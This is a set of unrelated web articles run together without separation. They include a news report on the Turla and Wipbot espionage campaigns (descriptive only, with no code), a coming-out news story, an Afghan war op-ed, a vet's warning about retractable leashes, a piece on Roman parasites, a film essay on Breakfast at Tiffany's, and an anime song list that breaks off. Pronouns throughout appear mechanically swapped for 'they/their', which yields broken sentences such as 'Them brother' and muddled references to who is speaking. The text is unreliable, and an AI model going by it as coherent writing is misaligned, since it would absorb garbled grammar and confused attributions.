The one-two combination has all the hallmarks of a nation-state intelligence gathering operation targeting the embassies of former Eastern Bloc countries in Europe , China , and Jordan , according to Symantec .
`` Wipbot is used as a recon tool at some stage , and if the victim is believed to be of high interest , then Turla is delivered at that point , '' said Vikram Thakur , senior security researcher with Symantec . `` We see a few technical similarities between the two that makes us believe that they are both developed by people either in the same building or are part of the same organization . ''
The malware known as Turla is not new , but it has been part of a series of espionage campaigns conducted for at least four years . In March , security firm G-Data and government contractor BAE Systems described one campaign using Turla , which they called Uroburos and Snake . The campaign compromised US and European targets .
In the latest campaign , a handful of former Soviet states was targeted , but Symantec did not name the countries . In May 2012 , for example , an attacker infiltrated more than 60 systems in the office of the prime minister of a former Soviet Union member country . A second attack targeted the embassy to France of another such nation , eventually infecting both the nation 's ministry of foreign affairs and internal affairs .
Symantec did inform every victim 's computer emergency response team prior to publishing its analysis , the company said .
Turla has some attributes that have led other security researchers to link it to another piece of malware , Agent.BTZ . Agent.BTZ spread through USB memory sticks and widely infected the US Department of Defense .
Symantec 's Thakur did not extend the link between Wipbot and Turla beyond those two programs . While the security firm did not connect the attacks to any particular nation-state , it did point out that most of the components of the program were compiled in the UTC + 4 time zone . Both Moscow and St. Petersburg are in that time zone .
The problem with any attempts at attribution is that sophisticated nation-state adversaries can easily create a development environment that produces code that appears to be from a second country , Thakur said . Yet , only a nation-state would likely have the funds and wherewithal to conduct an operation of the complexity as the Wipbot-Turla combination , they said .
`` They are going after explicit government networks that are not easy to find , '' Thakur said . `` There were some IP networks that we had to deeply research , because we had no idea what they were . ''
Photo of the Day on
- I will admit , I am a sucker for snapped out whip shots like this . The whip has great dynamic and is especially sick when scrubbed , and simply is one of the coolest looking tricks our sport has to offer . Wide angle lens choice was good here . Helps lift the rider up , and also gives us a combo of blue sky across the top and a balanced share of race course detail and the table top . Shooting long lens here pushes the riders into the forest too much and makes for dark shots . The nice morning side lighting here at Sea Otter brings good contrast and colour across Danny and their bike , and also brings to life the peanut gallery on the lower left . Props to the photographer for being there early . Composition is dialed , but it would have been cool to see what happened one or two frames later too . Nice POD !
Sometimes coming-out stories are heartwarming tales of acceptance and love . Other times they are tragic accounts of abandonment and abuse .
Ashley Pierce , a 20-year-old from Georgia , came out as gay last October . At the time , their father was unresponsive and their stepmother seemed supportive . However , things took a turn for the worse Wednesday when Pierce found themselves a part of what they describe as a “ delayed intervention ” involving their father , stepmother and grandparents .
They apparently captured footage of the interaction on camera .
“ I wanted to make sure there was evidence in case something happened , ” Pierce told The Huffington Post in an email .
WARNING : Video at bottom of post may be disturbing .
Pierce 's video began going viral after it was posted by Dan Savage with Seattle 's The Stranger . In the five-minute clip , which does not focus on any individual 's face , the people in the room with Pierce can be heard telling them their sexuality is a choice . When they dispute that , they use religion as an argument .
“ No , you can believe that if you want to , ” a woman , presumably their grandmother , can be heard saying , “ but I believe in the word of God , and God creates nobody that way . It 's a path that you have chosen to choose . … You go by all the scientific stuff you want to . I 'm going by the word of God. ” They go on to say that since Pierce has “ chosen that path ” they will no longer support them and they need to move out because they “ will not let people believe that I condone what you do . ”
Pierce asks their stepmother if they can stay in the house , but they refuse .
“ You 're full of s * * t , ” they say . “ You told me on the phone that you made that choice . You know you was n't born that way . You know damn good and well you made that choice . You know that [ your father ] has done everything they can to raise you . … They did n't need to blame himself . ”
At this point , an apparent physical altercation occurs . The camera starts moving , and Pierce can be heard yelling to the woman to stop hitting him . A man yells , “ You 're a damn queer. ” At the end of the video , someone calls them “ a disgrace . ”
Pierce took to Facebook to discuss what happened Wednesday :
What a day… . i thought that waking up at 9:48 and being 15 mins late to work was going to be the biggest problem today . but i did n't know that my biggest problem was going to be getting disowned and kicked out of my home of almost twenty years . to add insult to injury my stepmother punched me in the face repeatedly with my grandmother cheering them along . i am still in complete shock and disbelief [ all sic ] .
“ Their reaction was pretty much expected [ once ] I chose to leave instead of pray because they have always been very vocal about not supporting the gay lifestyle , ” they told HuffPost . “ My [ stepmother 's ] reaction was the most surprising and hurtful . ”
The family members involved in the intervention , which they say was “ driven by my grandparents , ” have not contacted the media , but they left Pierce a voicemail telling them to remove the video of the incident from YouTube . Pierce also says they did not contact police over the apparent altercation in the video .
The footage , originally posted by Pierce 's friend , had more than 700,000 views , as of Thursday afternoon . Pierce 's story has been covered by the Advocate , the Daily Dot and the New Civil Rights Movement . A GoFundMe campaign was set up to help raise money to cover Pierce 's living expenses ; by Thursday , it had collected more than $ 19,000 .
WARNING : This video contains graphic language and may be disturbing .
The GoFundMe campaign set up for Pierce has raised almost $ 80,000 as of Friday evening .
If you or someone you know is struggling with the aftermath of coming out or other issues related to being an LGBT youth or young adult , visit the Family Acceptance Project and The Trevor Project for resources .
RELATED STORIES
The Hearthstone iPad rollout begins : today , we 've launched Hearthstone for iPad in Australia , Canada , and New Zealand , with other regions around the world to follow soon !
The iPad version of Hearthstone brings all of the features and excitement of deck-building and dueling your friends that 's currently available for PC right to your fingertips . Wherever you have an Internet connection , you can log in to Hearthstone and amass your card collection , play a friendly game or two against your buddies , or test your skills in Play or Arena mode !
Your Hearthstone collection and data is shared across all devices , so if you 're playing from your PC or Mac at home , you wo n't miss a beat when you take Hearthstone on the go with the iPad !
Launching Hearthstone in a limited set of countries allows us to focus on the end-to-end player experience and make sure it 's awesome before we move on to the rest of the world . If you do n't live in Australia , Canada , or New Zealand , you do n't have much longer to wait to get your hands on Hearthstone for iPad—Murloc Scout 's honor .
Keep an eye on playhearthstone.com , Hearthstone on Facebook , and Hearthstone on Twitter for the latest news and rollout updates !
iPad is a registered trademark of Apple , Inc .
The Afghan war , the longest in US history , is `` scheduled to end '' a year early , according to the Pentagon . Wars these days run to electoral timetables . The endgame is couched not as victory , let alone defeat , but as `` expedited withdrawal '' .
It is obvious that Taliban commanders are reading Sun Tzu , and `` building the enemy a golden bridge across which to retreat '' . They are talking to go-betweens , opening offices in Doha and giving soothing interviews . This week 's leaked American intelligence report , The State of the Taliban , shows that the Afghan people , too , are coming to terms with the return of their former rulers , and might even welcome some stability and order after 10 years of Nato-induced chaos .
The US president , Barack Obama , has always hated this war of neocon fantasy , and is now calibrating their departure . Militarily , the path to defeat has been straightforward . While it is easy to bomb a capital and deploy armies to topple a regime , occupying foreign countries for any length of time is usually disastrous . Soldiers become brutalised , allies desert , operations become costly and counterproductive .
Nato strategists did not need Napoleon or Hitler for a warning , merely Soviet experience in Afghanistan in the 1980s . Even after Mikhail Gorbachev saw the writing on the wall and decided to withdraw in 1985 , it took them four years to do so . As also indicated in this week 's report , the Pakistanis , supposedly allies of the west , have long sided with the Taliban . Even Kabul 's ruler and western puppet , Hamid Karzai , has said they would support Pakistan in any putative war with the US . It does not matter what America or Britain does . The logic of a prolonged occupation of a Muslim country is remorseless .
More alarming about the Afghan war has been its psychology . It has generated some two dozen books on my shelf , and every one of them warns , cautions , criticises , condemns . The Pashtun Taliban should not be underestimated . Defeating them by main force flew in the face of all experience . Pakistani intelligence would offer them sanctuary and support . Nato should not drive al-Qaida , a tiny Arabist cell in 2001 , into alliance with the Taliban . The idea that force of western arms could turn a corrupt Muslim statelet into a sanitised , pro-western democracy was arrogant and unreal .
Every warning was disregarded in a classic of `` cognitive dissonance '' . The Afghan war has been sustained by years of mendacity and deceit from western governments . Elected representatives , the media and public opinion were induced to buy the line that success was `` just around the corner '' . Embedded journalists would report that the army was `` winning hearts and minds '' and the Taliban were on the run . Sooner or later Nato would `` retrain '' the Afghan army , despite constant reports of the hatred and unreliability this army felt towards the occupation . Just last week , the British government bizarrely pledged to build `` an Afghan Sandhurst '' , presumably as a palace for some future Taliban warlord .
All military and diplomatic experience , all the history and the scholarship in the world , did not stop this crude punitive venture being backed by conservatives and liberals alike in both the US and Britain . It was declared a good war . The drumbeats of battle stifled criticism . Any general got a cheer who could boast that the war would be over in weeks , and without a shot fired . Critics were met with the timeless , drear refrain , that their talk was defeatist , cowardly and lacked patriotism . Like Rhett Butler in Gone with the Wind , they were drowned by the lust for glory .
Nor were the lobbies idle . Bruised from its Iraq debacle , the British army wanted somewhere to walk tall . Helmand , with its echoes of Beau Geste and Lawrence of Arabia , was ideal . Behind the army lurked the call of money , an ever-burgeoning regiment of arms suppliers , security firms , contractors , NGOs and aid agencies , all fat on the war 's staggering $ 500bn cost . Add to them Kabul 's kleptocrats , politicians and aid recipients , and the war took on a self-sustaining quality . Even today few participants have an interest in its ending . Hundreds , then thousands , die , and no one can honestly say why .
Withdrawal will not be as easy as from Iraq , messy and unresolved as that remains . The new Taliban may be media-friendly and , for the present , amenable to calls for moderation . They are said to be more sophisticated than those who seized Kabul amid appalling bloodshed in 1996 . But it is hard to believe their leaders will have cause to compromise in a year 's time , hailed as heroes of Islam for having humbled the might of Nato . Their Pakistani backers will be equally exhilarated . Whatever might have been achieved against al-Qaida with minimal force in 2001 – on which I recommend Lucy Morgan Edwards ' book The Afghan Solution – is past history . Resumed chaos beckons .
Unlike most European countries , sucked into the Afghan vortex by Nato blackmail , Britain and the US were willing warriors , with belligerence in their cultural genes . Discussing `` what must be done '' to order the rest of the world is second nature to their political class . Successive British governments bought into the lies and scaremongering of George Bush 's war on terror . Gordon Brown and David Cameron alike claimed that the killing fields of Helmand were integral to safety on the streets of London , and indeed to the security of the British state . People believed them . War induced a cockeyed credulity .
The Afghan war has not made the west one jot safer , almost certainly the reverse . Islamist terrorism and its obverse , panicky security , is polluting this year 's Olympic Games in London . Yet the war clearly responded to a yearning in many Britons to see the world as still their ancestral responsibility . To them a war that turns out right , such as in Libya , `` proves '' Britain 's manifest destiny .
Which is why this is not the endgame . Britain is even now rattling sabres and dicing with disaster alongside the US against Iran . Such a war would be as catastrophic as could be imagined , and against a country that poses no conceivable threat to western security . The sole reason for going to war against Iran is to go to war against Iran . That is how we went to war against Afghanistan and Iraq . Clearly , nothing has been learned .
I was reading an article the other day about the top “ must have ” pet products for summer . I was really enjoying the article until I came to one entry : the retractable leash .
Retractable leashes are very , very popular . In case you are n't familiar with them , they are leashes that consist of a long , thin cord on a reel . The leashes range in length , but their selling point is that they are very long ( some up to 26 feet ! ) , allowing your dog to roam and exercise but still be under control . With the click of a button , you can reign in your pet , albeit a foot or two at a time .
If there is pet product that is more loathed by veterinarians than the retractable leash , I do n't know what it is . It has sent many an individual ( both pets and humans ! ) to the hospital . Sure , they allow your dog to stop and smell the roses without hindering your walk , but they also contribute to bad behavior and injury .
Why retractable leashes are bad for pets
Retractable leashes almost always teach a dog to pull . Think about it—you 're on a walk and your dog wants to walk faster than you . They pull on the leash , and you let out a foot or two of line to let them walk ahead . BAM ! You just rewarded them for an undesirable behavior ( pulling on the lead ) . When you reward behaviors , they are repeated .
Dogs who are 10 feet away from you on a walk are NOT under control , even if they are on a leash . The retractable leash is n't magic—it does n't suddenly pull your pet to you when you unlock it . You have to essentially reel them in , and a lot can happen in the time it takes you to get control of your dog .
We veterinarians have seen all manner of injury due to the use of retractable leashes . Dogs on long leads can dart into traffic and get hit by a car . They can get into fights . They can get tangled in their own leash cord , which results in injuries to the limbs . They can tangle YOU in their cord , causing you to fall or be dragged .
The retractable cord itself is a hazard . Friction burns ( or “ rope burns ” ) are very common . Human hands and doggie mouths and tongues are frequent victims of a fast moving retractable cord . There are even multiple reports of amputations due to the cord being wrapped around an owner 's finger when their pet took off without notice .
Lastly , the reel and handle part of the leash are heavy and the unit is easily dropped . Imagine this scenario : you and your dog are out on a walk . She 's walking about 10 feet in front of you , and you both are daydreaming . Suddenly , they see a squirrel ( or other distraction ) and bolts . You were n't expecting this and you drop the leash .
Now the retractable leash is retracting , and the way your dog sees it , it is clunking along the road and IT IS CHASING HER ! This can be terrifying to dogs , and will encourage them to continue running ( despite dangers like oncoming traffic ) and ignoring your commands to return . This scenario happens , and lost dogs or worse are the result .
Have I put you off this “ must have ” product ? I hope so , and your vet does , too !
Good plumbing is an overlooked , but vital , part of modern life . One of the first civilizations to really get a handle on it was the Romans . So why did the prevalence of parasites during Roman times increase compared to the Iron Age ?
Research just published in the journal Parasitology indicates that Roman toilets and bath houses did not do anything to decrease the number of parasites feasting on Roman flesh . Piers Mitchell , of Cambridge 's Archaeology and Anthropology Department , reveals that Romans were plagued by mites and fleas , were stuffed full of roundworm and whipworm , routinely got dysentery after ingesting the protozoan Entamoeba histolytica , and generally had a miserable time—despite their celebrated plumbing .
Advertisement
How do they know this ? It turns out that intestinal parasites are more durable than you might think . According to the paper , “ The eggs of most intestinal helminths can be preserved for thousands of years in the right conditions , due to their tough chitinous walls . Human feces in archaeological contexts can be recovered from latrine soil , coprolites ( preserved pieces of human feces ) and the pelvic soil from burials , where the intestinal contents would have decomposed after death. ” Amoeba remains can be detected by antibodies that react to them . Fleas , ticks , and mites “ can be detected by fine sieving of soil , and also looking for them on hair combs , mummies or ancient textiles . ”
The Roman did have impressive water and sanitation systems . They also had decent laws meant to get sewage out of the cities and keep the water clean . So what went wrong ?
Mitchell has several ideas about that , some of which have nothing to do with the toilets . For instance , the Romans loved a fermented fish sauce , called garum . It was an ancient way of making MSG , and probably added savor to their food , but it also might have contributed to the number of Romans infected with fish tapeworm . The communal baths , though seemingly hygienic , could also have been breeding grounds for disease .
Advertisement
Mostly , though , it looks like Romans did exactly the wrong thing with all the sewage that they channeled out of their cities . They got it away from dense populations of people only to fertilize their food with it . Fertilization with human feces can be perfectly safe . If the feces is composted for a long time , the parasites die off and the remaining nutrients boost crop yields .
However , there 's no indication that the Romans knew , or had laws to enforce , safe composting . Sanitation only works if you can make sure that the parasites are gone before any humans will come into contact with them again .
On the other hand , public toilets allowed Roman citizens to write things like , “ Secundus defecated here , ” on latrine walls—and a few parasites have to be worth that .
Advertisement
[ Human parasites in the Roman World : health consequences of conquering an empire ]
The logo of Emirates airline is seen on the wing of one of their airplanes after takeoff from Dubai airport April,16,2013 . Picture taken April 16 , 2013 . REUTERS/Ahmed Jadallah
DUBAI ( Reuters ) - Dubai airline Emirates EMIRA.UL plans to replace “ a large chunk ” of its Boeing ( BA.N ) 777 aircraft with a new model launched by the planemaker , Emirates ' President Tim Clark said on Monday .
Boeing announced earlier in May that it had begun selling an upgraded aircraft family code-named 777X , launching a race against Airbus for sales of long-haul jets .
Related Coverage Qatar Airways in talks with Airbus to buy up to 15 jets
Fast-growing Gulf carriers are expected to be the first and biggest customers for Boeing 's latest offering .
“ I 'm looking to replace a large chunk of them ( 777s ) . It 'll be a large order , ” Clark told reporters in Dubai , without specifying the number of planes they plan to order .
Emirates is the largest 777 operators with up to 175 jets .
One evening last March , D.C. Council member Vincent B. Orange hit the Dupont Circle clubs with three of their constituents . With a sound meter in hand , the group cut through the alleys behind the bars and weaved through the lines of people on sidewalks , along the way measuring the sounds emanating from these popular weekend spots .
Orange was traveling with the D.C. Nightlife Noise Coalition , a Dupont watchdog group that tracks bars and clubs that exceed the city 's legal noise limits — which , in a commercial zone at night , may not exceed 60 decibels , the level of a normal conversation .
More than a year later , these residents say the sound has not subsided — and Orange says they have a solution . The council member introduced legislation this month requiring bars and restaurants to measure and submit to a city agency their outside noise levels every hour of operation between 9 p.m. and 4 a.m .
“ Praise the Lord , at least [ Orange ] is thinking about it , ” said Sarah Peck , a founding member of the coalition . “ The city is either unwilling or unable to enforce existing law . ”
Peck said the patios and rooftops , particularly these outdoor spaces that have a DJ or band playing , are the source of most of the noise problems .
The city 's bar owners , needless to say , do n't like the bill , which they argue would impose a giant clerical burden . More broadly , the proposal ignites a simmering tension between residents and the city 's rapidly expanding bar and dining scene , a huge engine of the D.C. economy driven by the city 's booming population of young people with disposable incomes .
“ We are very concerned with this legislation and [ its ] impact on all facets of the hospitality industry , ” Kathy E. Hollinger , the president of the Restaurant Association of Metropolitan Washington , wrote in an email . They added that the bill “ does not acknowledge the realities of industry operations . ”
Under Orange 's proposal , the first violation would result in a warning and the second in a fine between $ 500 and $ 1000 . After three noise violations , the city 's Alcoholic Beverage Regulation Administration would suspend the establishment 's liquor license . After the fourth , the business would lose its license .
“ I see that there is a tremendous amount of noise , which is wreaking havoc on the community , ” Orange said . “ The law is clear , 60 decibels … If the industry wants the government to stay out of this , then they need to follow the law . ”
It 's not clear how much support Orange has . Council member Mary Cheh ( D-Ward 3 ) is listed as the sole co-sponsor on the legislation — the Nightlife Regulation Amendment Act of 2015 — but their office said they unintentionally raised their hand to co-sponsor it during the council meeting May 5 and missed the deadline to have their name removed . Cheh 's office declined to discuss the merits of the bill itself .
Orange said they do n't expect the bill to pass intact . But they hope the introduction of the legislation serves as an impetus to discuss how to ensure the city 's nightlife establishments do more to comply with noise laws .
The D.C. Nightlife Noise Coalition , meanwhile , believes that Orange 's proposal does n't go far enough . In a letter to Orange , the coalition suggested that a system should be installed in each restaurant and bar that would allow them to submit sound readings electronically to regulators to ensure the accuracy and consistency of such readings . The establishments would cover the costs for the system . The coalition also recommended that “ DJs or music suitable for dancing ” be banned in outdoor spaces .
Last year , the Alcoholic Beverage Regulation Administration , the Department of Consumer and Regulatory Affairs and the Metropolitan Police Department launched a campaign that would encourage establishments to learn about and comply with D.C. noise laws .
As part of the campaign , officials made unannounced visits to liquor-serving establishments to ensure noise did not exceed the limit . In the first six weeks , the task force made 191 visits to 73 different D.C. establishments on Thursdays , Fridays , Saturdays and Sundays and found nine noise violations coming from just five bars .
Orange 's proposal has been referred to the D.C. Council 's Committee on Business , Consumer and Regulatory Affairs , which Orange leads . A hearing is scheduled for July 9 . Jessie Cornelius , a spokesperson for the Alcoholic Beverage Regulation Administration , said the agency is currently reviewing the bill and will provide comment at the hearing .
Autoduel is a 1985 role-playing video game published by Origin Systems for the Atari 8-bit family , Commodore 64 , Apple II , Macintosh , and MS-DOS . It was released in 1987 for the Atari ST and in 1988 for the Amiga . The game is based on the Steve Jackson Games series Car Wars . [ 1 ]
The game is set in a hypothetical future in the U.S. , where cars are a primary means of protection and defense , and the highways are dangerous stretches of land ruled by gangs and vigilantes with armed vehicles .
Autoduel is no longer available for commercial sale . However , because it is part of Electronic Arts ' ( `` EA '' ) intellectual property portfolio , EA issues takedown notices to any abandonware site found to be hosting it . [ 2 ] Apparently , recently , the original author obtained reverted rights from EA for this title , and is looking to bring it to current technology , in `` classic '' form . [ 3 ]
Gameplay [ edit ]
The player creates a character , naming them and distributing 50 points between three skills : driving , marksmanship and mechanic . The player 's character starts in New York , Friday 1-1-2030 . Without a car the player has to enter amateur night in which they are provided a vehicle in order to raise enough money to buy and equip their own vehicle . With their own vehicle , a character can begin performing courier missions between the various towns along the Atlantic seaboard—including Syracuse , Boston , Manchester ( Origin 's headquarters at the time , which could be visited in the game ) and Atlantic City among a few . The character may also enter more distinguished Arena events to earn money as well as take to the highways to fight the other cars and salvage their parts . In this sense , the game was very open-ended in what the player could do . The game also had a storyline , involving certain critical courier tasks , such as carrying important criminal evidence against `` Mr. Big '' , through the dangerous terrain between cities .
The main feature of the game was combat involving customized vehicles . The vehicle construction portion of the game allowed a variety of power plants , guns , ammunition , mine-layers , smokescreens , oil slicks and rockets to be arranged onto an even larger selection of body and chassis types .
The game was developed using a top-down perspective and featured two distinct setting areas : the arena or highway style area and the city area . The highway and arenas allowed acceleration and driving skills to be used in a scrolling screen format , while the city area was a single screen in which stores and other attractions of a city could be visited .
Reception [ edit ]
Computer Gaming World in 1986 reviewed the game positively , noting , `` The game design is clean , the graphics excellent and no bugs were found . '' The immense difficulty of the game was noted , as was the long learning curve . In emphasis , the review suggested bypassing the permanent death feature of the game and expensive in-game clones ( backup saves ) by making a copy of the character disk , to return to in case of character death . [ 4 ] In 1992 and 1994 surveys of science fiction games the magazine gave the title two of five stars , writing that `` Graphic and game play now appear very dated '' . [ 5 ] [ 6 ] Compute ! stated that Autoduel combined role-playing , arcade , and strategy features , calling it `` more than a game—it 's a complete system of play ... overall game play is excellent '' . The review concluded with `` highly recommended '' . [ 7 ] Game reviewers Hartley and Pattie Lesser commented on the game in their `` The Role of Computers '' column in Dragon # 120 ( 1987 ) , noting that the game `` combines the feel of the Road Warrior movies with the fantasy role-playing action of the Ultima adventure games . `` [ 8 ]
See also [ edit ]
References [ edit ]
Iran 's military says it has shot down a US reconnaissance drone aircraft in eastern Iran , state TV reports . According to reports , Iranian authorities managed to seize the unmanned aircraft upon being downed , which they claim received `` minimum damage . ''
­ '' Iran 's military has shot down an intruding RQ-170 American drone in eastern Iran , '' an unnamed source has reportedly told Iran 's Arabic-language television network .
The RQ-170 sentinel `` is a low observable unmanned aircraft system which the United States Air Force uses to `` directly support combatant commander needs for intelligence , surveillance and reconnaissance to locate targets . ''
According to the semi-official Fars news agency , Iran says it will continue to respond in kind to any drones that have violated the country 's airspace , even from outside the country 's borders .
However , US official say there is 'absolutely no indication ' the drone which crashed in Iran was actually shot down .
This is n't the first time Iran has claimed to act against a US drone operating from within its borders . In July , Iranian officials said a US drone was shot down while flying over the city of Qom , which authorities contend was gathering intel on a nearby nuclear facility .
Sunday 's reports of the downed drone come as the conflict between the US and Iran centering around the Islamic republic 's alleged nuclear weapons program continue to intensify .
In November , the International Atomic Energy Agency ( IAEA ) Board of Governors passed a resolution urging Iran to provide access to its nuclear facilities to UN experts .
The resolution followed a November 8 IAEA report which claimed Iran had been actively developing weapons .
While Iran has continued to maintain that their nuclear ambitions are for peaceful purposes , the US and the European Union have chosen to tighten sanctions on key Iranian industries .
Diplomatic tensions between Iran and the West continued to intensify after a dozen 's of Iranian students stormed the British embassy in Tehran Tuesday in response to the unilateral imposition of sanctions .
Britain immediately shut down its embassy in Tehran and subsequently closed the Iranian embassy in London on Wedensday , expelling all of its staff .
Other European countries also responded in kind , as Norway closed its embassy in Tehran , while Germany , ITaly , Sweden , and the Netherlands all opted to recall their ambassadors .
As the threats of even tighter sanctions loom over the country , Iran 's foreign ministry had responded that any attempts by the West to block oil exports would be met with a doubling of crude oil prices on the global market .
`` As soon as such an issue is raised seriously the oil price would soar to above $ 250 a barrel , '' foreign ministry spokesperson Ramin Mehmanparast reportedly said .
Iran , which received some $ 56 billion in the first seven months of 2011 from crude oil exports , is the world 's third-largest crude exporter and heavily dependent on revenues generated from the trade .
And while no final agreement on an oil embargo against Iran has been agreed upon within Europe , tougher sanctions could be be finalized next week , as various EU heads of state are set to meet for a summit this coming Thursday .
Author and journalist Afshin Rattansi told RT the US has once again broken international law by sending the drone to Iran .
They say that the fact that Washington thinks it can send drones to Iran shows how out of touch the West is .
“ They do n't really understand quite how powerful Iran has become both through the Arab awakening and through other huge geopolitical changes over the past 12 months . ”
Rattansi believes that what is really happening is that those countries that have been running the world are losing power and this is their last attempt to cling on to it .
Materialism and Despair : Emulation and Maturation
By Nick Giorgio
“ The possibility of this sickness is man 's superiority over the animal , and this superiority distinguishes them in quite another way than does their erect walk , for it indicates infinite erectness or sublimity , that they are spirit. ” –Søren Kierkegaard The Sickness Unto Death
Lula Mae Burns , portrayed by Audrey Hepburn , is the protagonist in the 1961 film adaptation of Truman Capote 's novella , Breakfast at Tiffany 's . They are the literary epitome of the 1960s New York café society girl , a manifestation of an enviable bourgeois lifestyle . Despite their material wealth and lavish mentality , their unhappiness is a fait accompli .
A motif of their story is escape . Lula Mae ensconces themselves throughout the story . The most obvious is the guise of their name . They go about their life under the pseudonym Holly Golightly . The surname Golightly is that of their annulled marriage to “ Doc ” Golightly ( Buddy Ebsen ) . It is peculiar that they choose the family name of their ex-husband when they are hiding from their espousal . They are trying to escape the stigma of marriage to pursue a bachelorette lifestyle that had n't really been there for her ; they married Doc when they were just fourteen years old .
Holly Golightly spends a lot of their time going on dates with different men . In the beginning of the film , they are trying to avoid contact with the man they had been on a date with the night before , Sid Arbuck ( Claude Stroud ) . They return home after a trip to Tiffany & Co. , a jewelry store that they occasionally window shops when they are trying to escape from the anxieties of life ( the “ Mean Reds ” as opposed to the proverbial “ blues ” ) , to see Sid had been sleeping in their car all night , waiting for them Sid catches up to them on their way to their apartment and tries to coax an explanation out of them as to why they left their date so abruptly . Sid is crazy about them and believes , in vain , that the feeling is mutual . They even forget their name , calling them Harry .
The next morning they meet an author , Paul Varjak . Paul needs to use the telephone . They quickly develop a close friendship . Holly calls Paul “ Fred ” because they remind them of their brother whom they have not seen for a long time . Them brother Fred is the source of a great deal of despair for them
Almost all of the important characters in Breakfast at Tiffany 's go by a pseudonym . The Danish existentialist philosopher , Søren Kierkegaard , was an advocate of the use of fake names in order to firmly establish the moral aspects of their writings . They wrote under pen names such as Johannes de silentio and Anti-Climacus as “ poetic creations ” to be , as quoted in their Journals , “ poetically maintained so that everything they say is in character with their poetized individualized personalities ” . It is possible that the characters in Breakfast at Tiffany 's went by false names in order to portray their true meanings .
“ Johannes de silentio ” was the name that Kierkegaard chose as the author of Fear and Trembling . In the section , “ A Panegyric Upon Abraham ” , de silentio goes on to describe the ineffectualness of words to describe the suffering of Abraham . God asked Abraham to sacrifice their son , Isaac , as a test of faith . Abraham endured such exhaustive despair because of the paradox of performing an ethically evil deed to show to God , the absolute authority of that which is “ good ” , that they were faithful to Him . Kierkegaard explains that within the realm of human ethos , it is impossible to interpret what Abraham went through . We lack the words to explain Abraham 's situation . We are left in silence .
There is a scene in Breakfast at Tiffany 's where we see Holly enter their apartment with a man named José da Silva Pereira ( José Luis de Vilallonga ) , and within seconds they are throwing a fit . Paul , who had escorted them to the apartment , immediately walks in and tries to calm them down . They succeed in putting them to bed only after they have destroyed everything they own and almost kills their cat ( which has no name ; they just refers to it as “ cat ” ) . It is assumed that José had done something to cause Holly to become so incredibly furious . However , it is discovered that they had received a telegram from Doc that their brother Fred was killed in a car accident . The lone , precious familial aspect of Holly 's life was suddenly taken from them José asks Paul if it is appropriate to call the police because Holly has performed an act seen as destructive and needed authoritative restraint from capable people . Paul tells José that there is no crime in destroying your own home . Police intervention would only attempt to assimilate Holly 's inexplicable actions with the ethos of people who could never fully understand them despair .
Another book by Kierkegaard is The Sickness Unto Death written under the pseudonym , Anti-Climacus . The “ Sickness ” that Anti-Climacus is referring to is despair . When people have a fatal illness , they desperately want to live . They are simultaneously trying to go on while they are dying . When a person is sick with despair , however , they are living with a desperate desire to die .
To suffer from despair is to be human . The complex issue of suffering is what differentiates human beings from other , less developed life forms . Suffering comes from our ability to reason and become self-conscious . We often see others living the life we 've always dreamed of . Kierkegaard proclaims :
Thus when the ambitious man whose slogan was “ Either Caesar or nothing ” , and they do not become Caesar , they are in despairs over it . But this signifies something else , namely , that precisely because they did not become Caesar they now can not bear to be himself . Consequently they are not in despair over the fact that they did not become Caesar , but they are in despair over themselves for the fact that they did not become Caesar .
For Holly Golightly ( and many women of the era ) , it was the life of the café society girl . They were living the lifestyle , but under false self-awareness . This fake persona disguised their true self : a woman desperately longing for true love . Anybody could see the connection between Paul and Holly , but Holly blindly avoided true love to live a lie . They flirted with man after man , without regard to each man 's feelings , treating each as an object of temporary relief , personifying their relationship with Tiffany 's .
Towards the end of the film , Paul escorts Holly on a cab ride . Holly intends on going to the airport and catching a plane to Brazil where they plan to marry José , who had written them a letter explaining that their relationship can not continue after they were arrested because of their involvement in a drug ring with Sally Tomato ( Alan Reed ) . They insist on going along with the marriage anyway . They ask Paul to read their José 's letter because they “ can not read without their lipstick ” . In the letter , José refers to Holly as their “ little girl ” , symbolizing their immaturity at becoming self-aware . They go on explaining their despair at learning that they were not the girl they had hoped they are . They ask them for forgiveness and that God may be with them
They want to quickly end their despair by granting death to their single lifestyle . This is paradoxical because they are using the thing that had been causing their despair , matrimony , to end their despair , which had be prolonged by avoiding their true self . According to Kierkegaard , despair is a natural occurrence when the self is attempting to realize itself .
This is a sort of knee-jerk reaction to their sudden need for fraternal love after the death of their brother . Marriage to José would have prolonged Holly 's suffering because they did not truly love him . They were too clouded by ambition to be someone they were not , to marry someone whom they did not truly love , to realize that true love was right in front of them Of course , Paul was their true love , as foreshadowed by their pseudonym “ Fred ” , the name of Holly 's brother .
The climax of the film ( note that it is not the ultimate climax of despair , which can not end until death , hence the name Anti-Climacus and the title of their book ) begins when Holly has a breakdown after Paul finishes reading José 's letter . They still insist on going to Brazil in order to not “ waste a perfectly good plane ticket ” . They want Paul to mail them a list of the fifty richest men in Brazil . Again , they are determined to continue their lavish lifestyle by filling their love void with anyone who can materialistically satisfy them Paul can not let them go on because they are in love with them
The following dialogue brings an important existential theme , freedom , into fruition :
Paul : I love you .
Holly : So what .
Paul : So what ? So plenty ! I love you , you belong to me !
Holly : No . People do n't belong to people .
Paul : Of course they do !
Holly : I 'll never let anybody put me in a cage .
Paul : I do n't want to put you in a cage , I want to love you !
There is a paradox here . The only way Holly can be free is to submit themselves to love . They compare themselves to cat . They are both “ no-name slobs ” who do n't belong to anybody . They “ frees ” cat by letting them out of the cab , allowing them to chase an unlimited amount of rats ( a term they call the men dates ) .
When Paul gets out to search for cat , Holly finally realizes what Paul means to them They wind up searching together , eventually finding cat , and concluding with a kiss . It is only then that Holly ends this aspect of their despair and realizes their true self .
The existential themes of suffering , anxiety and despair are present throughout Breakfast at Tiffany 's . The thematic experience is concurrent with the teachings of the 19th Century philosopher , Søren Kierkegaard . The film is an excellent expression of the plight of every person , of trying to discover their self .
Yes the month is almost over , but I believe it 's better to keep a proper record , especially since I also do the referral links as well for those interested . I apologise for the extreme delay , but here 's the one for the first month of the year . Also I 'm changing the song titles from Japanese texts to romanji version , since it 's probably making this easier as a database . Let me know if you like the change or not .
One other question though . For those tracks that comes in bundle with the bd discs , what information should I put in to replace the usual Amazon/CDJapan line ? I highly doubt people will buy single volume just for the music , but please let me know what other type of information would you like to know instead .
7th
Parasyte OP
“ Let Me Hear ” – Fear , and Loathing in Las Vegas
– Fear , and Loathing in Las Vegas Amazon/CDJapan
Tsukimonogatari ED
“ border ” – ClariS
– ClariS Amazon/CDJapan
Warubure OP
“ Hi no Ito Rinne no GEMINI ” – petit milady
Amazon/CDJapan
14th
Psycho Pass Movie OP
